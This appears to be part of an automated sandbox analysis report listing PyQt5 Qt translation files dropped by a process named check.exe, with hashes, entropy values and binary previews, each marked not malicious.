SHA-512:	EC3D68126488C3A163898BACAF7E783217868573635182CAF511ED046B4BE1F99A71FBB24DA607CCB50EDAF70893007AAEE9A6BAAE4C1CD33465A0915AA965DA
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......jaB...(.(.....S.0T......5w....'.Uj......`.......a[............u..t............!.39.....................B<s......M^..............J...>.O5^...O..)^......o>.......J...............t...w.8dz.....D ......k.N.....k.N...H...n.......I...........i..2>...<......G......9..G....P..w............i..........,................^..........'.$a......6.>...5..........K............S.W.b...2._Xn......GN...@..~.......TH.....!.......K.H.............pN...........S.P.~.....o.....\|..(..............~....o.s.>.....o.......z.q..................@.........h.....&....... ..e.....i........@.(0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0K0.0W0.0~0[0.0..).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..:..........Note:.....QCLuceneResultWidget......i.}"}Pg...........Search Results.....QCLuceneResultWidget.....R0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0.i.}"}Pg.0LN.[.Qh0jS..`'0L0B0.0~0Y0..........VThe search results may

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_help_ko.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	5708
Entropy (8bit):	5.698914195742074
Encrypted:	false
SSDEEP:	96:elPQHJ6L4c7LaQaFQv2QEhBL+Ejma0W40U0BzlQlcrnUSaTIdspIc18CLRSM3LBY:dHI97W1BbNz1VqqzJpoj5y5uY7OGrWFE
MD5:	CD15674A652C2BF435F7578E119182F8
SHA1:	AEA22E4A0D21396733802C7AB738DDD03737B7D6
SHA-256:	F11C64694E8E34E1D2C46C1A1D15D6BA9F2DB7B61DE4FDF54ECA5AB977C3E052
SHA-512:	88BFA112F4DBC0BFB4013CE0937E5180B4AB4A217FC8A963798C7C86532E794E4A1AD88416AE42F26A1C0631B465A5D69BFE75366E048502F5E21F4115A12F19
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......koB............%.......0T......K:^...g.Uj......`........YJ...>.E.4...........z...>..........;.B<s...K.B\>...b........+.s.....zq....[..9....F..vR......@.......@.......:....c.8Z......g.N...7..F....\|...........t.....D ......k.N.......I...m..^......`#....!..2.......G....@...N.................................X..K....{.......i..GN......NO.............K.H..........S..pN...z..V...............................>...........:.~.....i..%c.....z.q....i...s......D.0. .............Add Filter.....FilterNameDialogClass.......D.0. .t...:..........Filter Name:.....FilterNameDialogClass........... ...L..........Untitled.....QHelp.....(...L... ...\|.D. .....`. ... ...L.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....".....0...\|. .... ... ...L.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....2...\|. .%.1... ...x. .L.t...D. .... ... .................&Cannot create index tables in file %1......QHelpCollectionHandler.....,.

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_help_pl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	9673
Entropy (8bit):	4.622652249027856
Encrypted:	false
SSDEEP:	192:TO/7kBL9wGu3wtCnlhLJUBB7oph+mZ18LgP:T8QnwcCnlhdvphpZ18LgP
MD5:	2B68446B69D9AA40B273D75A581D2992
SHA1:	8A09BD38998543B74E2673478EDD54FB4BBDD068
SHA-256:	CC6CB4D8C54086224672F2E49E623C8CB7C0C1CD65B8D5ECD42FC9BA3A6065BD
SHA-512:	F3A3D6A416B3411613B06FC3EE56625D4D4DE80087182AB0D0601E49314861ABEF97D11A15B4C0511911544A59FBC4A4A52F0CCF0FD43F763A76A8922D8E57B6
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......plB.....(.......0T....T.5w......Uj... R.`.......a[...............t............2.39....H......6.......n.B<s.. ...M^..._......6.O5^...F..)^......o>...............t.....D ......k.N.....k.N.../...n.......I...W..........2>...w................G.......w............&.......:..,................^...(..... ..$a....?.6.>...$..........K......W.b....._Xn......GN...Y..~......!.....*.K.H...E....."...pN...-.........P.~...}.o........(....1..~......s.>......%c.."..o.....r.z.q............................h................e.....i..#.......N.i.e.n.a.z.w.a.n.y..........Untitled.....QHelp.....P.N.i.e. .m.o.\|.n.a. .s.k.o.p.i.o.w.a... .p.l.i.k.u. .z. .k.o.l.e.k.c.j...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....>.N.i.e. .m.o.\|.n.a. .u.t.w.o.r.z.y... .k.a.t.a.l.o.g.u.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....H.N.i.e. .m.o.\|.n.a. .u.t.w.o.r.z.y... .t.a.b.e.l. .w. .p.l.i.k.u. .%.1........... Cannot create tables in file

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_help_ru.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	7288
Entropy (8bit):	5.297177914619657
Encrypted:	false
SSDEEP:	192:dBJjvfq7D6X68uBAzlp5W9+yBPZZZMM7vL0PXJL:JKrMEL0PXJL
MD5:	794AF445A5D7082D51BD22683449F86D
SHA1:	3A0C369872B112A1572AA17EEB814B168B225D98
SHA-256:	557B644E6DA5F1EC720EF93965617087E4D1F40B2494CC5AA524CF3796108DE7
SHA-512:	D42C870A16AEE7626BBE24886AD423895529A2F1A51AC2DBC303BC0E4EF9D3241FE894ECA3F7217AD408C8DCEE165CA4B89D84570357B0EB80340A3F72B0A846
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ruB..........\.%.......0T......K:^.....Uj....L.`........YJ...X.E.4...............>............B<s.....B\>............+.s.....zq.......9....B..vR...L..@.......@....G..:......8Z......g.N......F....>...........t.....D ....R.k.N...E...I...W..^......`#....s..2.......G....^...N.........................K.......d..K............O..GN...b..NO.............K.H.............pN...P..V....................g..........>.............~........%c.....z.q....i........$...>.1.0.2.;.5.=.8.5. .D.8.;.L.B.@.0..........Add Filter.....FilterNameDialogClass.........<.O. .D.8.;.L.B.@.0.:..........Filter Name:.....FilterNameDialogClass.........5.7.K.<.O.=.=.K.9..........Untitled.....QHelp.....b...5. .C.4.0.;.>.A.L. .A.:.>.?.8.@.>.2.0.B.L. .D.0.9.;. .:.>.;.;.5.:.F.8.8. .A.?.@.0.2.:.8.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....<...5. .C.4.0.;.>.A.L. .A.>.7.4.0.B.L. .:.0.B.0.;.>.3.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....`

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_help_sk.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10388
Entropy (8bit):	4.70568613551943
Encrypted:	false
SSDEEP:	192:uPq7iBWseXKkVu4+Qv9zEJ1xGMaLNmBgJqdC6/MxIMt:LWcseV04Xv9zEoLNDJqdX/MxRt
MD5:	75C94E59F1FC5312AE25381C247AF992
SHA1:	E3E5F4582CC5FAFE6DF43644D11484861023C084
SHA-256:	F41E33E1D790BD0D3EB180F1F875BC191FE74773628F25C2CAD95E1402E66867
SHA-512:	959B8F4D57FC9728DD4804322333D1792D45A0EE85615B559E0CA3BD2DEA22E2C8C68C6482AE9425D29C819B0ED27473EDDC82EF4B6ECFFB2E2E7B56E1509B63
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......sk_SKB...8.(.......0T......Uj......`.....0.a[....8..........t..............1"......39.......s........... .....%..........B<s...6..MQ..............J..$-.0.......O5Q......)Q...;..o>...........G...J..$......."....t.....8dz..#..D ......k.A...2.k.A.......n..._...I.................. ...21..........e.........G...!...w....Y...........!...........=...Q............$a......6.>.........."...K....i......# ._Xa..."..GA..............~.......TH..!{.K.H.."7.........pA..........%..P.~.....o........(..........!...~....u.s.1.....o.......z.q...c..............................f..e....9i..&-......(.D...v.o.d.o.m. .m...~.e. .b.y.e. .t.o.,. .~.e. .d.o.k.u.m.e.n.t...c.i.a. .s.t...l.e. .n.i.e. .j.e. .z.i.n.d.e.x.o.v.a.n.....).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......P.o.z.n...m.k.a.:..........Note:.....QCLuceneResultWidget.....".V...s.l.e.d.k.y. .h.>.a.d.a.n.i.a..........Search Results.....QCLuceneResultWidg

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_help_sl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10363
Entropy (8bit):	4.613473842638716
Encrypted:	false
SSDEEP:	192:vNBqTi7qBCVIQf54EslZ2Jy/L/BnmpP0bX3caK6q1B6/hgIlCCUb0:vjq2+UVT4ESZOYmpP0bX26q1I/yqCCUw
MD5:	3B0AEE27B193A8A563C5CB5C7C4FE60F
SHA1:	C94E832595EC765370553468F87C02DB7E7D138A
SHA-256:	2EC955E662407EBCD8DCDAE5AAA21E4108E0B5B0AEE0E9DB712C27072943535F
SHA-512:	EBC25C378126876F44279E23CA0CF06FC9E7D5F51AD7E3DBDABA7A50C81112EDC1C76F7FD0AF47E447A93C3593BB953A0C9C1FBBFC49494E6B29BF21655F690E
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......slB...8.(.....E.0T......Uj......`.......a[............!..t..............1"....;.39.......s....^............$........i.B<s...,..MQ..........}...J..#..0.....Z.O5Q...[..)Q......o>...............J..$I......"W...t...C.8dz..#H.D ......k.A.....k.A.......n.......I.................. P..21....................G...!...w............?...!...3...........Q...+........$a....>.6.>.........."...K...........".._Xa......GA..............~....A..TH..!I.K.H..!..........pA...>......%..P.~...>.o........(....d..... ...~......s.1.....o.......z.q.....................................e....{i..&.....z.(.R.a.z.l.o.g. .j.e. .m.o.r.d.a. .t.o.,. .d.a. .s.e. .d.o.k.u.m.e.n.t.a.c.i.j.o. .a.e. .v.e.d.n.o. .i.n.d.e.k.s.i.r.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......O.p.o.m.b.a.:..........Note:.....QCLuceneResultWidget.....".R.e.z.u.l.t.a.t.i. .i.s.k.a.n.j.a..........Search Results.....QCLuceneResultWidget.......R.e.

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_help_tr.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	4629
Entropy (8bit):	4.68793836539357
Encrypted:	false
SSDEEP:	96:BoiK0UD2wMLb7Lqlguotqbww5BLNwWjK0kHU9zuQlUVUfniqthweEIFwC18lLEGA:PXFf7pU75BWWOpcJcVqDFNz8brgyf76r
MD5:	32D6EE3D8EE6408A03E568B972F93BCB
SHA1:	582EE079DBD42000C378E0701D26405750524DBA
SHA-256:	EBDECA0CFEE7A9441DEB800BABFD97C63BC4E421DA885C55B3BD49725EBACD25
SHA-512:	24AAA30B9CB4DB82A57411FBA24A87D70D8B845AE48A6FDA633D0BE6B824B58FDD2F450C2B385F16F49E2F9C6FA0A3124FD0F28594726940F996C66F8F3216CC
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......tr_TRB.....%.....[.0T......Uj......`.....$..............L.B<s.....B\>..........4.+.s...............t.....D ......k.N...5...I......2.......G....5...N..........a...............f..K....9..........GN...........@.K.H..........q..pN...t..........>...z.~...../..%c.....z.q....i..........B.a._.l.1.k.s.1.z..........Untitled.....QHelp.....J.K.o.l.e.k.s.i.y.o.n. .d.o.s.y.a.s.1. .k.o.p.y.a.l.a.n.a.m.1.y.o.r.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....2.D.i.z.i.n. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....\.%.1. .d.o.s.y.a.s.1.n.d.a. .d.i.z.i.n. .t.a.b.l.o.l.a.r.1. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r...........&Cannot create index tables in file %1......QHelpCollectionHandler.....N.%.1. .d.o.s.y.a.s.1.n.d.a. .t.a.b.l.o.l.a.r. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r........... Cannot create tables in file %1......QHelpCollectionHandler.....P.S.q.l.i.t.e. .v.e.r.i.t.a.b.a.n.1. .s...r...c...

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_help_uk.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	9750
Entropy (8bit):	5.281035122342072
Encrypted:	false
SSDEEP:	192:eMp79BCN+u8hhbHbny+HJouHgei50JBSfDvbetpP/RIkT:eIhgNgBbny+phiS3SfDDetpP/RRT
MD5:	90A776917D534B65942063C319573CDC
SHA1:	5DF3B213D985A3BBDB476B37B7780D7D7DF17E41
SHA-256:	497CFC473684692EE44D7A3795E8FB2270C57069FD9EB98A615DD29AB9BE8A7C
SHA-512:	B34A019716B50CE8E1E20AC32756B3B0D5802971F7A04F4BDDE2418DA551AFB9742B79E934979DB6FAB9DAC05D7D26A3B19ABA77158321F8D9AAB08AEBBD455A
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......uk_UAB...(.(.....?.0T......5w......Uj......`.......a[...............t............K.39....u....."..........B<s...8..M^...j......y...J..!..O5^...Y..)^......o>...o...J..":...... <...t...E.8dz..!3.D ....".k.N.....k.N...d...n.......I..............2>...>......o.........G.......w............E.......e..,................^...S........$a......6.>...'...... y..K........... ..W.b....._Xn......GN...p..~.......TH...4.!.....9.K.H.............pN..........#].P.~...~.o.....N..(....b.........~......s.>.....o.....o.z.q..........................U.h.............D..e.....i..#.......(...@.8.G.8.=.>.N. .F.L.>.3.>. .<.>.6.5. .1.C.B.8. .B.5.,. .I.>. .4.>.:.C.<.5.=.B.0.F.V.O. .4.>.A.V. .V.=.4.5.:.A.C.T.B.L.A.O...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........@.8.<.V.B.:.0.:..........Note:.....QCLuceneResultWidget.....". .5.7.C.;.L.B.0.B.8. .?.>.H.C.:.C..........Search Results.....QCLuceneResultWidget....... .5.7

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_help_zh_CN.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	6441
Entropy (8bit):	5.790303416386852
Encrypted:	false
SSDEEP:	192:pB37nBD4H5PCyLDxLSzJPduYx9vja/FIgH9yIFqfs:rTZ4HUAD1S1JFe/F59PFqfs
MD5:	9297A6905B8B1823BF7E318D9138A104
SHA1:	3DB992A1B3BBCAF314B7EA4A000D6334D7492A52
SHA-256:	C02AAA20923F18ADDAB520BE5CB84EFD4C723396BDC24B4C9A72D406F101C7B4
SHA-512:	01F12CEE0AE456D78942A6049E1C77F94B406C8FFB4A5944DE15E54D1C760CDBA13279530A8F29B1443D1BBC647D3AF5436AAD8C43EB3944316C48300B3827E4
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......zhB......I....L.0T......Uj......`.......a[...............t....P..@....Z.......<.........39.......s....2.................B<s......MQ..........9...J......31.....0.......O5Q......)Q...^..o>...........(...........J...V...........t.....8dz.....D ....Z.k.A.....k.A.......n.......I...........t..w................!...........o.......D...Q...E........$a......6.>...h...............%._Xa......GA..........._..TH...r.........pA.............P.~.....o.....].~.q.............~......o.....h.z.q...........H..0q....................i........2..S.u...y.`.Q.v.S.V.S..f/V.N:..e.hckcW(..}"_.0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..............Note:.....QCLuceneResultWidget......d.}"~.g...........Search Results.....QCLuceneResultWidget.....,d.}"~.g.N_..^vN.[.et..V.N:..e.hckcW(..}"_............VThe search results may not be complete since the documentation is still being indexed!.....QCLuceneResultWidget..

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_help_zh_TW.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	9301
Entropy (8bit):	5.80411750798786
Encrypted:	false
SSDEEP:	192:4bgIXwsL78BQp4dRDP0ludqODa/wkB/tTWn5dJ6mO8IZiT9Dzz/wI3HyRWqUqS:lI/oS4dR5c/tTWn5/EZA9D/w+H8WqUqS
MD5:	47C3328D3918CF627112BB6C50E30B86
SHA1:	05705603AB3F28402A6C103E1C41DDFF21D140C0
SHA-256:	3697F1660D7F2AC9B37AC33CD1C7ECAE08ADBD26710E7E0076497CCDDC8BC830
SHA-512:	8DE1C3C5A48965CF6D8AA545DA9F0A5C00AE124F3E4153597915E7C0F4CAE1E26723270F58A47AA9FFA4AAF30E6EBA522D4EBAD27DECF17EF108E353E611980E
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......zh_TWB......I....[.%.......0T......0T......Uj......Uj....R.`.....>.a[....................g..t....7..@......................39.......s................... .........B<s.....B<s.....B\>......MQ..........[...J...]..31.....+.s...c.0.....U.O5Q......)Q...C..o>.......................J...............t...3...t.....8dz.....D ....R.D ......k.A.....k.A.....k.N...'...n.......I.......I...........[..2....x..G........N......w................!...........:...........Q...&...............$a......6.>...I.......L.......$..K......................_Xa...y..GA...O..GN...........$..........TH...I.K.H................ Y..pA...K..pN.............P.~.....o.....D.~.q......>.............~......~........%c.. ..o.....!.z.q...........#..0q....................i..!Y....(..g.S..f/V.p.N.W(^.z.e.N.v.}"_.uvN-0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......P..;............Note:.....QCLuceneResultWidget......d.\.}Pg...........Sea

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_hu.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	146
Entropy (8bit):	3.6255640074603277
Encrypted:	false
SSDEEP:	3:j2wZC4C/IrLlAlHekfK/gp1MUXaMlI+rwtbWlMiayIPldkOgn:CwDrC+TYIUrIRt6HoiHn
MD5:	5A46979B45C67DD6312F33CCEA2ED7BC
SHA1:	4C56836B1FB10D9903B299CBCB925947D515B4C8
SHA-256:	BB246AABD501E14CED8B1FFC1369E3D5D26567AAE62B3EAD4D94C22FB77C3471
SHA-512:	BDBA4E1731CF254E95B0F1337410937C765E96FBB1D42F1D053033E1511FEE6F50C02705F781F4DAA0347E2299DC78A5A9942AC4EA343ED1F8F401F9ACD961E4
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......hu....v.....q.t.b.a.s.e._.h.u.....q.t.s.c.r.i.p.t._.h.u.....q.t.m.u.l.t.i.m.e.d.i.a._.h.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.h.u

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_it.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.5752972123113778
Encrypted:	false
SSDEEP:	3:j2wZC4C/EbFlAlHeke5zOp1MUWLt7KlI+rwtbWlMj5FKIPldkOA9kk:CwDM+35aIUW5SIRt6Q50oi9Gk
MD5:	2BB8C94D420D3BC344C79A01043BDC89
SHA1:	3FBA773D58E6D3699C20AB41AEE6801E71E2DDAE
SHA-256:	9117AAC2D07BC86DFA55A29B8825ED27C7093300FCC90E143E135E00E85F09D7
SHA-512:	C6B13655AFB206B0056F5656B4A9BF33CC267FCC928F6973258131CFA6443970510226FE45A041E5AA988809E17D0B11C7458F4A241C71521EDED186596C6055
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......it....v.....q.t.b.a.s.e._.i.t.....q.t.s.c.r.i.p.t._.i.t.....q.t.m.u.l.t.i.m.e.d.i.a._.i.t... .q.t.x.m.l.p.a.t.t.e.r.n.s._.i.t.......

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_ja.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	146
Entropy (8bit):	3.599979504080125
Encrypted:	false
SSDEEP:	3:j2wZC4C/il/lAlHekd6hY1MUV6JAlI+rwtbWlMgel3UlIPldkOG:Cwz4+pjUGAIRt6qVUloiB
MD5:	8A1EE3433304838CCD0EBE0A825E84D8
SHA1:	2B3476588350C5384E0F9A51FF2E3659E89B4846
SHA-256:	23457CE8E44E233C6F85D56A4EE6A2CECD87C9C7BDDE6D8B8A925902EED1CD9C
SHA-512:	2D8ACD668DF537E98B27161F9FA49828EB2EB6E9CF41DB38E7F5D31F610D150CD1B580A8AE9B472A4DFDE4D4BF983C24A56293BB911CF5879368664E4D4CF3D2
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ja....v.....q.t.b.a.s.e._.j.a.....q.t.s.c.r.i.p.t._.j.a.....q.t.m.u.l.t.i.m.e.d.i.a._.j.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.j.a

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_ko.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	146
Entropy (8bit):	3.652277257665055
Encrypted:	false
SSDEEP:	3:j2wZC4C/rrr/lAlHekcQ/01MUUQMlI+rwtbWlMhQGlIPldkORn:CwCC+1Q/UUpIRt6SBloimn
MD5:	7B2659AF52B824EAC6C169CDD9467EE9
SHA1:	5727109218B222E3B654A8CC9933E970EB7C2118
SHA-256:	4CC1AF37E771F0A43898849CFF2CD42A820451B8D2B2E88931031629D781DB05
SHA-512:	E9475AC80BDBBEFF54F2724A2B6BA76992F18FD1913FD8EE1540A99FD7A112B79FED5A130B6AC6D7460E4420C06354FC6E4CF7770A7C6CBD3EAC1BDAF0082DE5
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ko....v.....q.t.b.a.s.e._.k.o.....q.t.s.c.r.i.p.t._.k.o.....q.t.m.u.l.t.i.m.e.d.i.a._.k.o... .q.t.x.m.l.p.a.t.t.e.r.n.s._.k.o

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_lt.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	165383
Entropy (8bit):	4.805977227348512
Encrypted:	false
SSDEEP:	1536:i5v3+zmayloj6yJjhnBAbnrKnGrhA7WgdXclIsooY9i:SvOzAloj6yJ9BA7riGr+7WKXc+s5ui
MD5:	8992B652D1499F5D2F12674F3F875A35
SHA1:	E22766A49612F79156C550D83C6C230345DDA433
SHA-256:	47EB5F97467DF769261421D54A5BEA1131C9FB9B6388791D38BB6574335B64BF
SHA-512:	9B8B6DBFF432F2A46C14BC183A6BAF84ACBF02BF2C5BB8C306C6538FBD9BE1C0A9015BD46728F2F652F9163AFC56B1E16D16EB95D8F7728F3C562AE9F4F1AE1E
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ltB..0X.....)C...+...\|......P....@..9....A..9....B..:....C..:....D..;....E..;....F..<6...G..<....H..=)...I..=....P..>q...Q..>....R..?....S..@f...T..@....U..A\...V..B....W..B....X..C....Y..Cy...]..k....t..........t>......th......t.......pd...;..J'...;.._h...;.......;...{...;..J....;...)...M..l....O...R...O...............}..l9...m..lo......^S..(5..P{..+;..4...+;......+;......+O..4...+O......1...^...E@..?p..F...C...H4......HY......H.......I...D...I@..s...IA..t...IC...2..J.......J....Y..J.......J.......K...9...LD...`..L.......PS......R.......T...q...Zr...`..[`......[`..&@..\....e..\....b.._......._....P..1........E..........5........L..1...O...1...PP......7......../...........$.......$.......,.......y.......y..........K^..............x......8................L...E.......E.......E......................%..:....%.........0U.....W......Zo.....^....5.......0..I....0...F...0...\|...0.......0.......0..+\...5...}.......... D...g.. D......+....j..,.......,.......<U...+..<U

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_lv.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	89
Entropy (8bit):	4.156834975253888
Encrypted:	false
SSDEEP:	3:j2wZC4C/HzllldQlHekbxplUp1MUTJ+b:Cwv+DIUEb
MD5:	19F1B919BB531E9E12E7F707BEBD8497
SHA1:	46E82683CEA28D877C73A5CE02F965BB1130FC62
SHA-256:	03467738042A15676E504BA02CB326DCDB773B171FADA3CD62B7A0E0564314A0
SHA-512:	901D7B26CAC7A4D0FFDB39A1D25767B5BC71BED4AFBE788D70BF19D4C58A8295167111675AB45E743FDF4768AF874D69417414C01CF23D5C525A3F6C8BF7D21F
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......lv....0.....q.t.b.a.s.e._.l.v.....q.t.s.c.r.i.p.t._.l.v........)....

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_pl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	161
Entropy (8bit):	3.8693516202048612
Encrypted:	false
SSDEEP:	3:j2wZC4C/5J/p/lAlHekHp/7KlI+rwtbWlM6Tl/z21MUPp/FOlIPldkOjehB:Cwr+26IRt6nFURkloiT
MD5:	D71EA9FEFD97464B178235150EC8759E
SHA1:	61026FE602FD1B8B442A0D341C6BD759EEC75488
SHA-256:	BD7DD0C2CAB119A973DC10C3BFF7499D9728B928B541F86056921B30C8DB78E6
SHA-512:	ECD76A7D8B8D733E635B2BFEA90A4CD387B83D9D8A4EB6D299F59FF22AAA8D617A4C886A825A1CDDD901925C7839E2C18BDD4E0CD84152641922B66B62663F77
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......pl....v.....q.t.b.a.s.e._.p.l.....q.t.m.u.l.t.i.m.e.d.i.a._.p.l.....q.t.s.c.r.i.p.t._.p.l... .q.t.x.m.l.p.a.t.t.e.r.n.s._.p.l............,..

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_pt.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	70334
Entropy (8bit):	4.732724622610353
Encrypted:	false
SSDEEP:	768:OKGUuWW+WHjS0gMBd483+Y7bDPs4RHBloLUIltlzAJnx4nnliM1OPlOibLG:JGUuWPuSgm0Jn+n4Mhj
MD5:	6656500F7A28EF820AE9F97FD47FB5BB
SHA1:	CC112B9C9513BCF7497F3417168B4C8A9F7640A9
SHA-256:	2C1E7BBF5168A64B43752DD4C547601C0BDE6D610F8671FA3E3AF38597E84783
SHA-512:	5C3CBFCF86AF6B4D949C1D914CD379E512E73BA350AF661033A386EE7FB981FBFCB43D9A35FDE7656E17BB09F64F1469F84867A780573C3359D645269461D5A6
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......pt_PTB...(......9...+...e...]..6....;.......;..-....;..;`...;..};...;.......M..6....O... ...O...w...........}..7....m..7B..........+;......+;..8S..+;..>...+O......+O..8#..H4......H.......J......K.......LD...)..L....}..PS...l..Zr...B..[`...;..[`.....\...kU.._......._.......1...?...............8...............E............,..................p........0...............v...........%...O...%..G........4...0.......0..:....0..y....0..\|....0.......0...X...5.......5...... D..=... D..Kn..+....L..,...>...,......<U..z...<U......<.......F...>...F.......H5...4..H5..=...H5..K...H5......f....p..f...1...f...;...f...I...f...\|H..f.......f.......l....................b......<...............>.......L ...........`......`..._.......A......2....e...g...e..>D...e..LW................y...,..y......y..o...y......T..L...0..'..*.0....+F...y..+F......+f......+f...C..+.z..0..+.....d.+....p0.+.....R.+.z..0U.+.....u.+....8..+....Ct.+....L..+....y..+.....Z.+......+...pc.+.....+....0..

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_ru.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	164
Entropy (8bit):	3.984562388316898
Encrypted:	false
SSDEEP:	3:j2wZC4C/oZlAlHekF8Op1MUNKJKlI+rwtbWlM4KKIPldkOSxRMugB:CwY+GIUgcIRt61oihM3
MD5:	F7A8C75408B9A34A2B185E76F51B7B85
SHA1:	065E987139C5FB809A6F9CDF3845BCD79707FDBB
SHA-256:	6492B267608C6FB76907BD8FCFC8F1EF57E9F4EBBC2E81ACA81715A88388F94A
SHA-512:	E768C5B438EC899801B22B1325F2244ACCC5E7C2EC5D270F510BC3CBC2D9A0536949C026DB7FB5862835E506A9F2020DEB2CC4001E7011FF974324542734F855
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ru....v.....q.t.b.a.s.e._.r.u.....q.t.s.c.r.i.p.t._.r.u.....q.t.m.u.l.t.i.m.e.d.i.a._.r.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.r.u........)......,..

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_sk.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
